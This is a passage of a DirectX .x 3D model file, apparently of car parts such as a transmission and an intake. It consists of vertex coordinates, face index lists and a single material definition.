-0.521755;0.009847;0.805808;, -0.521754;0.095341;0.531343;, -0.709005;0.092727;0.531342;, -0.709005;0.007234;0.805808;, -0.520719;-0.034181;1.028629;, -0.520718;-0.003944;0.859449;, -0.707354;-0.006548;0.859449;, -0.686865;-0.036500;1.028628;, -0.519690;-0.038075;1.328429;, -0.519689;-0.038075;1.079994;, -0.685287;-0.040386;1.079994;, -0.685287;-0.040386;1.328429;, -0.790226;-0.110951;1.328429;, -0.790226;-0.110951;1.079994;, -0.816857;-0.151092;1.079993;, -0.816858;-0.151092;1.328429;, -0.794040;-0.108150;1.028671;, -0.822130;-0.084192;0.859407;, -0.852663;-0.130214;0.859406;, -0.820776;-0.148450;1.028671;, -0.826011;-0.071562;0.805697;, -0.826013;0.013862;0.531453;, -0.856516;-0.032118;0.531453;, -0.856516;-0.117542;0.805698;, -0.964344;-0.227287;0.805633;, -0.964341;-0.141904;0.531518;, -0.964341;-0.295449;0.531518;, -0.964344;-0.380833;0.805633;, -0.918336;-0.249018;1.028704;, -0.959097;-0.237643;0.859373;, -0.959097;-0.391107;0.859373;, -0.918336;-0.385308;1.028704;, -0.913090;-0.249606;1.328429;, -0.913090;-0.249606;1.079993;, -0.913090;-0.385428;1.079993;, -0.913090;-0.385428;1.328429;, -0.521460;0.068325;0.524758;, -0.708711;0.065712;0.524759;, -0.708710;-0.019780;0.799223;, -0.521458;-0.017168;0.799223;, -0.520416;-0.031621;0.855578;, -0.707051;-0.034227;0.855578;, -0.686563;-0.064178;1.024757;, -0.520415;-0.061859;1.024758;, -0.519382;-0.066096;1.079994;, -0.684981;-0.068408;1.079994;, -0.684980;-0.068408;1.328429;, -0.519382;-0.066096;1.328429;, -0.770394;-0.127765;1.079994;, -0.797025;-0.167907;1.079995;, -0.797026;-0.167907;1.328429;, -0.770394;-0.127765;1.328430;, -0.802714;-0.100654;0.854361;, -0.833247;-0.146676;0.854362;, -0.801358;-0.164912;1.023626;, -0.774623;-0.124613;1.023625;, -0.806447;-0.002727;0.527409;, -0.836950;-0.048707;0.527409;, -0.836951;-0.134132;0.801654;, -0.806446;-0.088151;0.801655;, -0.939553;-0.141904;0.531517;, -0.939553;-0.295449;0.531517;, -0.939553;-0.380833;0.805633;, -0.939553;-0.227287;0.805633;, -0.934997;-0.237643;0.853572;, -0.934997;-0.391107;0.853572;, -0.894236;-0.385308;1.022903;, -0.894236;-0.249018;1.022903;, -0.888301;-0.249606;1.079993;, -0.888301;-0.385428;1.079993;, -0.888300;-0.385428;1.328429;, -0.888300;-0.249606;1.328429;, -0.107886;-0.249606;1.328429;, -0.107886;-0.385428;1.328429;, -0.107886;-0.385428;1.079993;, -0.107886;-0.249606;1.079993;, -0.101954;-0.249018;1.022903;, -0.101954;-0.385308;1.022903;, -0.061193;-0.391107;0.853572;, -0.061191;-0.237643;0.853572;, -0.056635;-0.227287;0.805633;, -0.056635;-0.380833;0.805633;, -0.056634;-0.295449;0.531517;, -0.056634;-0.141904;0.531517;, -0.189742;-0.088151;0.801655;, -0.159236;-0.134132;0.801656;, -0.159237;-0.048707;0.527409;, -0.189742;-0.002727;0.527409;, -0.221564;-0.124613;1.023625;, -0.194829;-0.164912;1.023625;, -0.162942;-0.146676;0.854360;, -0.193473;-0.100654;0.854360;, -0.225793;-0.127765;1.328428;, -0.199162;-0.167907;1.328429;, -0.199162;-0.167907;1.079994;, -0.225793;-0.127765;1.079994;, -0.476805;-0.066096;1.328430;, -0.311208;-0.068408;1.328429;, -0.311207;-0.068408;1.079994;, -0.476805;-0.066096;1.079993;, -0.475772;-0.061859;1.024757;, -0.309624;-0.064178;1.024758;, -0.289136;-0.034227;0.855578;, -0.475772;-0.031621;0.855578;, -0.474730;-0.017168;0.799224;, -0.287478;-0.019780;0.799225;, -0.287477;0.065712;0.524759;, -0.474729;0.068325;0.524759;, -0.083097;-0.385428;1.328428;, -0.083097;-0.385428;1.079994;, -0.083097;-0.249606;1.079994;, -0.083097;-0.249606;1.328428;, -0.077851;-0.385308;1.028703;, -0.037090;-0.391107;0.859373;, -0.037090;-0.237643;0.859373;, -0.077851;-0.249018;1.028703;, -0.031846;-0.380833;0.805633;, -0.031846;-0.295449;0.531519;, -0.031846;-0.141904;0.531519;, -0.031845;-0.227287;0.805633;, -0.139671;-0.117542;0.805699;, -0.139670;-0.032118;0.531452;, -0.170176;0.013862;0.531452;, -0.170176;-0.071562;0.805698;, -0.175412;-0.148450;1.028670;, -0.143524;-0.130214;0.859407;, -0.174057;-0.084192;0.859406;, -0.202149;-0.108150;1.028671;, -0.179330;-0.151092;1.328428;, -0.179330;-0.151092;1.079994;, -0.205962;-0.110951;1.079994;, -0.205962;-0.110951;1.328429;, -0.310900;-0.040386;1.328429;, -0.310900;-0.040386;1.079994;, -0.476501;-0.038075;1.079993;, -0.476500;-0.038075;1.328430;, -0.309323;-0.036500;1.028630;, -0.288834;-0.006548;0.859449;, -0.475471;-0.003944;0.859449;, -0.475470;-0.034181;1.028628;, -0.287181;0.007234;0.805808;, -0.287181;0.092727;0.531343;, -0.474433;0.095341;0.531342;, -0.474434;0.009847;0.805807;, -0.173315;-0.160161;1.357928;, -0.211979;-0.101881;1.357929;, -0.253221;-0.058171;1.357928;, -0.289306;-0.040687;1.357929;, -0.475309;-0.649399;1.357928;, -0.421537;-0.636455;1.357929;, -0.371483;-0.610630;1.357928;, -0.327570;-0.573154;1.357929;, -0.291884;-0.570570;1.357929;, -0.273351;-0.567918;1.357929;, -0.083098;-0.404937;1.357929;, -0.083098;-0.230097;1.357929;, -0.101140;-0.198044;1.357929;, -0.083097;-0.404937;1.050493;, -0.083097;-0.230097;1.050493;, -0.101140;-0.198044;1.050494;, -0.173316;-0.160161;1.050495;, -0.211979;-0.101881;1.050494;, -0.253221;-0.058171;1.050494;, -0.289306;-0.040687;1.050493;, -0.475309;-0.649399;1.050495;, -0.421537;-0.636455;1.050494;, -0.371483;-0.610630;1.050495;, -0.327570;-0.573154;1.050494;, -0.291885;-0.570570;1.050493;, -0.273351;-0.567918;1.050495;, -0.306511;-0.601220;0.837584;, -0.266418;-0.598316;0.837584;, -0.031845;-0.215796;0.837583;, -0.052116;-0.179783;0.837583;, -0.133204;-0.137222;0.837583;, -0.176643;-0.071745;0.837583;, -0.222979;-0.022636;0.837584;, -0.263521;-0.002994;0.837584;, -0.472495;-0.686882;0.837584;, -0.412082;-0.672339;0.837584;, -0.355846;-0.643323;0.837584;, -0.472495;-0.737168;0.499567;, -0.412082;-0.722625;0.499567;, -0.355846;-0.693610;0.499567;, -0.306511;-0.651506;0.499567;, -0.266417;-0.598316;0.499567;, -0.245595;-0.595336;0.499568;, -0.223641;-0.620260;0.499568;, -0.196724;-0.637949;0.499568;, -0.166683;-0.647187;0.499567;, -0.135550;-0.647347;0.499568;, -0.105434;-0.638417;0.499567;, -0.078377;-0.621004;0.499567;, -0.056212;-0.596287;0.499567;, -0.040441;-0.565942;0.499567;, -0.032130;-0.532021;0.499567;, -0.031847;-0.496826;0.499567;, -0.031847;-0.306941;0.499567;, -0.031845;-0.110508;0.499567;, -0.052116;-0.074496;0.499568;, -0.133203;-0.031935;0.499568;, -0.176643;0.033543;0.499567;, -0.222979;0.082651;0.499568;, -0.263521;0.102295;0.499567;, -0.472496;-0.737168;0.470144;, -0.412082;-0.722625;0.470145;, -0.355846;-0.693610;0.470144;, -0.306509;-0.651506;0.470145;, -0.266418;-0.598316;0.470144;, -0.245596;-0.595336;0.470144;, -0.223641;-0.620260;0.470145;, -0.196725;-0.637949;0.470144;, -0.166683;-0.647187;0.470145;, -0.135550;-0.647347;0.470146;, -0.105435;-0.638417;0.470145;, -0.078376;-0.621004;0.470145;, -0.056212;-0.596287;0.470144;, -0.040442;-0.565942;0.470145;, -0.032130;-0.532021;0.470145;, -0.031846;-0.496826;0.470145;, -0.031846;-0.306941;0.470145;, -0.031846;-0.110508;0.470145;, -0.052116;-0.074496;0.470144;, -0.133204;-0.031935;0.470146;, -0.176643;0.033543;0.470145;, -0.222979;0.082651;0.470145;, -0.263521;0.102295;0.470144;, -0.056575;-0.468492;0.837583;, -0.038719;-0.411251;0.866136;, -0.033592;-0.405189;0.844846;, -0.031845;-0.379490;0.837583;, -0.031846;-0.401764;0.826935;, -0.031846;-0.403208;0.808624;, -0.220948;-0.597277;0.837584;, -0.245595;-0.595336;0.808625;, -0.252536;-0.596329;0.837584;, -0.249317;-0.591659;0.866136;, -0.213628;-0.605587;0.837584;, -0.223641;-0.620260;0.808624;, -0.185457;-0.607486;0.837583;, -0.196726;-0.637949;0.808624;, -0.162751;-0.614468;0.837583;, -0.166683;-0.647187;0.808624;, -0.139219;-0.614589;0.837583;, -0.135550;-0.647347;0.808624;, -0.116458;-0.607840;0.837584;, -0.105434;-0.638417;0.808625;, -0.096008;-0.594678;0.837583;, -0.078377;-0.621004;0.808624;, -0.079256;-0.575997;0.837583;, -0.056212;-0.596287;0.808624;, -0.067336;-0.553062;0.837584;, -0.040442;-0.565942;0.808624;, -0.061054;-0.527424;0.837584;, -0.032130;-0.532021;0.808624;, -0.056575;-0.496697;0.837583;, -0.031846;-0.496826;0.808624;; 325; 11;325,7,4,3,2,1,0,331,330,329,328;, 4;326,325,328,327;, 12;315,314,325,324,323,322,321,320,319,318,317,316;, 6;7,325,314,313,19,18;, 11;20,19,313,312,311,310,309,24,23,22,21;, 12;8,7,18,17,16,15,14,13,12,11,10,9;, 4;5,4,7,6;, 4;303,326,327,304;, 4;302,325,326,303;, 4;222,302,303,223;, 4;223,303,277,224;, 4;277,303,304,278;, 4;263,277,278,264;, 4;219,277,263,220;, 5;334,335,277,219,218;, 3;335,334,336;, 5;224,277,335,336,221;, 5;336,337,302,222,221;, 4;361,301,302,337;, 4;301,324,325,302;, 4;304,327,328,305;, 4;278,304,305,279;, 4;264,278,279,265;, 4;261,264,265,249;, 4;260,263,264,261;, 4;215,263,260,216;, 4;214,262,263,215;, 4;213,259,262,214;, 4;216,260,259,213;, 4;236,250,249,233;, 4;233,249,265,234;, 4;234,265,266,235;, 4;232,266,265,229;, 4;231,280,266,232;, 4;266,280,281,267;, 4;280,306,307,281;, 4;306,329,330,307;, 4;305,328,329,306;, 4;226,305,306,227;, 4;225,279,305,226;, 4;228,280,279,225;, 4;230,279,280,231;, 4;229,265,279,230;, 4;235,266,250,236;, 4;250,266,267,251;, 4;251,267,268,252;, 4;267,281,282,268;, 4;281,307,308,282;, 4;307,330,331,308;, 4;308,331,0,26;, 4;246,308,26,247;, 4;245,282,308,246;, 4;248,54,282,245;, 4;242,282,54,243;, 4;241,268,282,242;, 4;244,82,268,241;, 4;238,268,82,239;, 4;237,252,268,238;, 4;240,100,252,237;, 4;239,82,100,240;, 4;113,100,82,114;, 4;114,82,83,115;, 4;112,83,82,109;, 4;109,82,54,110;, 4;110,54,55,111;, 4;108,55,54,105;, 4;105,54,26,106;, 4;106,26,27,107;, 4;26,0,1,27;, 4;27,1,2,28;, 4;55,27,28,56;, 4;107,27,55,108;, 4;83,55,56,84;, 4;101,83,84,102;, 4;115,83,101,116;, 4;116,101,100,113;, 4;102,84,85,103;, 4;84,56,57,85;, 4;56,28,29,57;, 4;28,2,3,29;, 4;29,3,4,30;, 4;126,29,30,127;, 4;125,57,29,126;, 4;128,58,57,125;, 4;122,57,58,123;, 4;123,58,86,124;, 4;86,58,59,87;, 4;104,86,87,90;, 4;119,86,104,120;, 4;118,85,86,119;, 4;117,103,85,118;, 4;120,104,103,117;, 4;90,87,88,91;, 4;87,59,60,88;, 4;133,88,60,134;, 4;136,89,88,133;, 4;135,61,89,136;, 4;134,60,61,135;, 4;132,61,60,129;, 4;131,33,61,132;, 4;130,32,33,131;, 4;129,60,32,130;, 4;59,31,32,60;, 4;31,5,6,32;, 4;32,6,7,33;, 4;33,7,8,34;, 4;34,8,9,35;, 4;35,9,10,36;, 4;63,35,36,64;, 4;62,34,35,63;, 4;61,33,34,62;, 4;64,36,37,65;, 4;36,10,11,37;, 4;37,11,12,38;, 4;65,37,38,66;, 4;66,38,39,67;, 4;38,12,13,39;, 4;39,13,14,40;, 4;67,39,40,68;, 4;68,40,41,69;, 4;40,14,15,41;, 4;41,15,16,42;, 4;69,41,42,70;, 4;70,42,43,71;, 4;42,16,17,43;, 4;43,17,18,44;, 4;71,43,44,72;, 4;139,89,92,140;, 4;138,88,89,139;, 4;137,91,88,138;, 4;140,92,91,137;, 4;124,86,85,121;, 4;121,85,57,122;, 4;127,30,58,128;, 4;58,30,31,59;, 4;30,4,5,31;, 4;111,55,83,112;, 4;243,54,82,244;, 4;247,26,54,248;, 4;227,306,280,228;, 4;220,263,262,217;, 5;217,262,333,334,218;, 5;337,336,334,333,332;, 4;188,223,224,185;, 4;185,224,221,186;, 4;186,221,222,187;, 4;187,222,223,188;, 4;188,185,186,187;, 4;184,181,182,183;, 4;181,220,217,182;, 4;184,219,220,181;, 4;183,218,219,184;, 4;182,217,218,183;, 4;178,213,214,179;, 4;179,214,215,180;, 4;180,215,216,177;, 4;177,216,213,178;, 4;180,177,178,179;, 4;198,233,234,199;, 4;199,234,235,200;, 4;200,197,198,199;, 4;200,235,236,197;, 4;197,236,233,198;, 4;201,240,237,202;, 4;202,237,238,203;, 4;203,238,239,204;, 4;204,201,202,203;, 4;204,239,240,201;, 4;152,113,114,149;, 4;149,114,115,150;, 4;150,151,152,149;, 4;151,116,113,152;, 4;150,115,116,151;, 4;146,111,112,147;, 4;145,110,111,146;, 4;148,109,110,145;, 4;146,147,148,145;, 4;147,112,109,148;, 4;208,243,244,205;, 4;205,244,241,206;, 4;208,205,206,207;, 4;206,241,242,207;, 4;207,242,243,208;, 4;209,248,245,210;, 4;210,245,246,211;, 4;211,246,247,212;, 4;212,209,210,211;, 4;212,247,248,209;, 4;144,105,106,141;, 4;142,143,144,141;, 4;143,108,105,144;, 4;142,107,108,143;, 4;141,106,107,142;, 4;164,125,126,161;, 4;162,163,164,161;, 4;163,128,125,164;, 4;162,127,128,163;, 4;161,126,127,162;, 4;168,129,130,165;, 4;166,167,168,165;, 4;165,130,131,166;, 4;166,131,132,167;, 4;167,132,129,168;, 12;71,72,61,62,63,64,65,66,67,68,69,70;, 4;170,135,136,171;, 4;170,171,172,169;, 4;172,133,134,169;, 4;171,136,133,172;, 4;173,138,139,174;, 4;174,175,176,173;, 4;176,137,138,173;, 4;175,140,137,176;, 4;174,139,140,175;, 4;169,134,135,170;, 4;157,122,123,158;, 4;158,123,124,159;, 4;158,159,160,157;, 4;160,121,122,157;, 4;159,124,121,160;, 4;153,118,119,154;, 4;156,117,118,153;, 4;154,155,156,153;, 4;155,120,117,156;, 4;154,119,120,155;, 4;193,232,229,194;, 4;196,231,232,193;, 4;196,193,194,195;, 4;195,230,231,196;, 4;194,229,230,195;, 4;189,228,225,190;, 4;190,225,226,191;, 4;191,226,227,192;, 4;192,189,190,191;, 4;192,227,228,189;, 7;261,249,256,257,258,259,260;, 18;255,256,249,250,251,252,100,101,102,103,104,95,96,97,98,99,253,254;, 7;94,95,104,90,91,92,93;, 4;341,338,332,333;, 4;274,341,333,262;, 4;258,274,262,259;, 4;257,273,274,258;, 4;256,272,273,257;, 4;272,275,276,273;, 4;275,289,290,276;, 4;289,312,313,290;, 4;290,313,314,291;, 5;276,290,291,339,340;, 5;273,276,340,341,274;, 3;341,340,338;, 3;339,338,340;, 4;271,285,275,272;, 4;285,288,289,275;, 4;288,311,312,289;, 4;287,310,311,288;, 4;284,287,288,285;, 4;270,284,285,271;, 4;254,270,271,255;, 4;255,271,272,256;, 4;269,283,284,270;, 4;283,286,287,284;, 4;286,309,310,287;, 4;25,24,309,286;, 4;53,25,286,283;, 4;81,53,283,269;, 4;99,81,269,253;, 4;98,80,81,99;, 4;80,52,53,81;, 4;52,49,25,53;, 4;49,23,24,25;, 4;48,22,23,49;, 4;51,48,49,52;, 4;79,51,52,80;, 4;97,79,80,98;, 4;96,78,79,97;, 4;78,50,51,79;, 4;50,47,48,51;, 4;47,21,22,48;, 4;46,20,21,47;, 4;74,46,47,50;, 4;77,74,50,78;, 4;95,77,78,96;, 4;94,76,77,95;, 4;76,73,74,77;, 4;73,45,46,74;, 4;45,19,20,46;, 4;44,18,19,45;, 4;72,44,45,73;, 4;75,72,73,76;, 4;93,75,76,94;, 4;92,89,75,93;, 4;89,61,72,75;, 4;253,269,270,254;, 4;298,321,322,299;, 4;297,320,321,298;, 4;296,319,320,297;, 4;295,318,319,296;, 4;294,317,318,295;, 4;293,316,317,294;, 4;292,315,316,293;, 4;291,314,315,292;, 4;339,291,292,343;, 4;343,292,293,345;, 4;345,293,294,347;, 4;347,294,295,349;, 4;349,295,296,351;, 4;351,296,297,353;, 4;353,297,298,355;, 4;355,298,299,357;, 4;357,299,300,359;, 4;359,300,301,361;, 4;300,323,324,301;, 4;299,322,323,300;, 4;359,358,356,357;, 4;357,356,354,355;, 4;355,354,352,353;, 4;353,352,350,351;, 4;351,350,348,349;, 4;349,348,346,347;, 4;347,346,344,345;, 4;345,344,342,343;, 4;343,342,338,339;, 4;361,360,358,359;, 4;337,332,360,361;, 10;360,332,344,346,348,350,352,354,356,358;, 4;344,332,338,342;; MeshMaterialList { 1; 325; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.000000;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _tranny Frame _intake { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh intake { 1058; -0.400858;0.709554;1.555932;, -0.400871;0.709554;1.009871;, 0.250197;0.709554;1.009854;, 0.250212;0.709554;1.555915;, -0.400871;0.663478;1.009871;, 0.250197;0.663478;1.009854;, 0.250212;0.663478;1.555915;, -0.400858;0.663478;1.555932;, -0.374887;0.709558;1.104384;, -0.374878;0.709558;1.461415;, -0.400859;0.709554;1.461424;, -0.400869;0.709554;1.104380;, -0.400859;0.663478;1.461424;, -0.400869;0.663478;1.104380;, -0.372396;0.663477;1.461414;, -0.372406;0.663477;1.104384;, -0.372396;0.377380;1.461414;, -0.372406;0.377380;1.104384;, -0.331142;0.709558;1.104383;, -0.331133;0.709558;1.461414;, -0.342125;0.663477;1.461413;, -0.342134;0.663477;1.104384;, -0.342134;0.377380;1.104384;, -0.342125;0.377380;1.461413;, -0.391585;1.041342;1.509899;, -0.391585;1.041342;1.485657;, -0.391585;0.709558;1.485657;, -0.391585;0.709558;1.509899;, -0.391597;0.709558;1.055903;, -0.391597;0.709558;1.080144;, -0.391597;1.041342;1.080144;, -0.391597;1.041342;1.055903;, -0.363648;1.024065;1.534140;, -0.380446;1.041342;1.526061;, -0.180232;0.942554;1.534135;, -0.173485;0.955949;1.523540;, 0.204185;0.725162;1.534125;, 0.194683;0.741863;1.523199;, 0.213326;0.730204;1.523534;, 0.224230;0.709558;1.522897;, 0.232832;0.709557;1.541340;, 0.214301;0.704314;1.534125;, 0.143256;0.862869;1.308575;, 0.129033;0.869115;1.325862;, 0.125189;0.873224;1.303807;, 0.129680;0.888567;1.190774;, 0.112612;0.898514;1.201748;, 0.112011;0.898768;1.178938;, 0.130054;0.887845;1.042876;, 0.112390;0.897995;1.042877;, 0.118684;0.885335;1.031648;, 0.214287;0.704314;1.031646;, 0.232819;0.709557;1.024430;, 0.224217;0.709558;1.042874;, -0.363661;1.026796;1.031661;, -0.380457;1.041342;1.039741;, -0.363648;0.709558;1.534140;, -0.383480;0.709557;1.541356;, -0.380446;0.709558;1.526061;, -0.361166;0.377380;1.532058;, -0.372395;0.377380;1.520830;, -0.372395;0.663477;1.520830;, -0.380997;0.663477;1.539274;, -0.361166;0.663477;1.532058;, 0.210520;0.663477;1.532043;, 0.230350;0.663477;1.539258;, 0.221747;0.663477;1.520815;, 0.221747;0.377380;1.520815;, 0.210520;0.377380;1.532043;, 0.210505;0.377380;1.033727;, 0.221735;0.377380;1.044955;, 0.221735;0.663477;1.044955;, 0.230338;0.663477;1.026511;, 0.210505;0.663477;1.033727;, -0.361179;0.663477;1.033742;, -0.381011;0.663477;1.026527;, -0.372408;0.663477;1.044970;, -0.372408;0.377380;1.044970;, -0.361179;0.377380;1.033742;, -0.380457;0.709558;1.039741;, -0.383492;0.709557;1.024446;, -0.363661;0.709558;1.031661;, -0.326155;1.026268;1.441638;, -0.336320;1.024176;1.466229;, -0.336803;1.017297;1.456076;, -0.329624;1.027995;1.122347;, -0.340069;1.020541;1.109245;, -0.338874;1.031366;1.098302;, -0.380447;1.041342;1.469495;, -0.374878;1.029501;1.461415;, -0.374887;1.029698;1.104384;, -0.380457;1.041342;1.096305;, 1.099437;0.594791;-0.753630;, 1.262640;0.555499;-0.847200;, 0.998339;0.619130;-0.630063;, 0.949830;0.630810;-0.476738;, 0.911196;0.640113;-0.244860;, 0.897141;0.643519;1.194910;, 0.854711;0.650522;1.203575;, 0.726773;0.683454;1.198555;, 0.725581;0.683707;1.363642;, 1.344338;0.535857;1.177490;, 1.338664;0.537189;0.145272;, 1.354364;0.533409;0.106494;, 1.386394;0.525698;0.085070;, 1.452801;0.509719;-0.898312;, 1.434503;0.433687;-0.898313;, 1.368095;0.449668;0.085071;, 1.336061;0.457379;0.106495;, 1.320360;0.461159;0.145273;, 1.326045;0.459826;1.177505;, 0.703602;0.592410;1.363661;, 0.837869;0.580560;1.203589;, 0.704793;0.592156;1.198573;, 0.878838;0.567489;1.194926;, 0.892889;0.564083;-0.244858;, 0.931525;0.554780;-0.476737;, 0.980033;0.543099;-0.630062;, 1.081130;0.518760;-0.753630;, 1.244340;0.479467;-0.847200;, 0.885311;0.606148;1.187328;, 0.845942;0.615729;1.195816;, 1.346588;0.495076;0.111305;, 1.339578;0.496762;0.143401;, 1.378878;0.487300;0.089703;, 0.899632;0.602679;-0.249988;, 0.938588;0.593299;-0.483803;, 0.987504;0.581522;-0.638409;, 1.089444;0.556979;-0.763008;, 0.714538;0.638067;1.371070;, 0.715837;0.637792;1.191056;, 1.286128;0.580941;-0.805190;, 1.277471;0.575724;-0.823089;, 1.134766;0.617381;-0.718410;, 1.121096;0.613404;-0.733390;, 1.044305;0.639160;-0.607842;, 1.026119;0.636277;-0.617288;, 0.999409;0.649971;-0.465939;, 0.979613;0.647417;-0.470546;, 0.961977;0.658984;-0.241279;, 0.941677;0.656557;-0.242806;, 0.929541;0.666808;1.228090;, 0.917252;0.662664;1.214108;, 0.866303;0.676338;1.240962;, 0.862608;0.670510;1.225029;, 0.735000;0.718806;1.235952;, 0.733111;0.710464;1.219990;, 0.732230;0.710650;1.342196;, 0.734349;0.718944;1.326232;, 1.314755;0.574077;1.177638;, 1.328281;0.563661;1.177576;, 1.301967;0.577119;0.136550;, 1.318916;0.565786;0.140255;, 1.326317;0.571257;0.076411;, 1.339537;0.560915;0.089127;, 1.381392;0.557999;0.039574;, 1.384865;0.550014;0.058792;, 1.432133;0.403161;-0.853156;, 1.431787;0.410533;-0.872384;, 1.859280;0.300330;-0.834687;, 1.860948;0.307259;-0.853871;, 1.860992;0.307254;0.081565;, 1.859324;0.300325;0.062379;, 1.348938;0.423183;0.039576;, 1.355669;0.428712;0.058793;, 1.293867;0.436441;0.076411;, 1.310339;0.439635;0.089127;, 1.269514;0.442303;0.136551;, 1.289761;0.444681;0.140256;, 1.282324;0.439255;1.177665;, 1.299096;0.442378;1.177600;, 0.695374;0.557058;1.326265;, 0.697262;0.565401;1.342226;, 0.698144;0.565214;1.220019;, 0.696027;0.556919;1.235984;, 0.836437;0.552282;1.240987;, 0.835802;0.559160;1.225051;, 0.897087;0.531992;1.228117;, 0.888032;0.541280;1.214133;, 0.929519;0.524168;-0.241276;, 0.912547;0.535569;-0.242803;, 0.966950;0.515155;-0.465938;, 0.950489;0.526439;-0.470544;, 1.011847;0.504344;-0.607840;, 0.996967;0.515187;-0.617287;, 1.102310;0.482565;-0.718409;, 1.091945;0.492329;-0.733389;, 1.253675;0.446123;-0.805190;, 1.248347;0.454707;-0.823089;, 1.313217;0.575470;1.256428;, 1.297427;0.579261;1.306612;, 1.310126;0.565756;1.317113;, 1.328459;0.563970;1.261427;, 1.311951;0.541421;1.330879;, 1.340089;0.537900;1.268261;, 1.321792;0.461869;1.268276;, 1.293859;0.468582;1.330501;, 1.301975;0.442729;1.261445;, 1.281164;0.447749;1.316744;, 1.263406;0.444821;1.306648;, 1.279202;0.441028;1.256463;, 1.233255;0.562564;1.364401;, 1.278398;0.549689;1.352291;, 1.238552;0.585159;1.343672;, 1.281821;0.570722;1.337752;, 1.240096;0.592021;1.328358;, 1.277398;0.583388;1.320999;, 1.259900;0.474505;1.349772;, 1.214952;0.486533;1.364416;, 1.249726;0.453459;1.329750;, 1.209385;0.464013;1.343696;, 1.244421;0.448697;1.321028;, 1.207641;0.457205;1.328384;, 0.916251;0.638922;1.173261;, 0.925572;0.636685;1.139063;, 0.962799;0.655260;1.150301;, 0.948332;0.658729;1.187727;, 0.904642;0.601497;1.171483;, 0.914071;0.599233;1.140186;, 0.897950;0.562892;1.173276;, 0.907271;0.560655;1.139078;, 0.917498;0.530649;1.187752;, 0.931961;0.527168;1.150329;, 0.928510;0.524434;1.192523;, 0.943974;0.520719;1.150183;, 0.976428;0.655535;1.150155;, 0.960964;0.659250;1.192496;, 0.735896;0.725774;1.281055;, 0.695587;0.552139;1.281127;, 0.794497;0.539920;1.323200;, 0.796272;0.547757;1.337884;, 0.802238;0.573170;1.357653;, 0.812505;0.616055;1.364563;, 0.829105;0.684193;1.338001;, 0.831081;0.691937;1.323331;, 0.822869;0.658904;1.357726;, 0.805545;0.582102;1.205203;, 0.799829;0.558983;1.225094;, 0.797970;0.551730;1.239882;, 0.829510;0.682317;1.225199;, 0.824137;0.659362;1.205268;, 0.831116;0.689456;1.240000;, 0.814926;0.620861;1.198258;, 0.796233;0.545825;1.281541;, 0.832228;0.694297;1.281632;, 0.678303;0.555798;1.235959;, 0.678802;0.551088;1.281102;, 0.677650;0.555937;1.326239;, 0.677809;0.564514;1.342198;, 0.678535;0.592278;1.363626;, 0.679977;0.639216;1.371022;, 0.681525;0.686136;1.363583;, 0.682564;0.713837;1.342130;, 0.682950;0.722364;1.326163;, 0.683094;0.729299;1.281019;, 0.683605;0.722226;1.235882;, 0.683444;0.713649;1.219924;, 0.682717;0.685883;1.198497;, 0.681277;0.638941;1.191010;, 0.679729;0.592025;1.198540;, 0.678690;0.564326;1.219992;, 0.654593;0.634896;1.190977;, 0.662292;0.588601;1.198518;, 0.666718;0.561269;1.219976;, 0.668015;0.552854;1.235945;, 0.668758;0.548192;1.281088;, 0.667364;0.552992;1.326225;, 0.665837;0.561456;1.342182;, 0.661098;0.588854;1.363604;, 0.653296;0.635172;1.370989;, 0.645595;0.681471;1.363538;, 0.641170;0.708805;1.342078;, 0.639872;0.717219;1.326109;, 0.639035;0.724059;1.280965;, 0.640524;0.717081;1.235830;, 0.642051;0.708617;1.219873;, 0.646788;0.681218;1.198452;, 0.600044;0.708258;1.235784;, 0.602864;0.700116;1.219828;, 0.611792;0.673759;1.198414;, 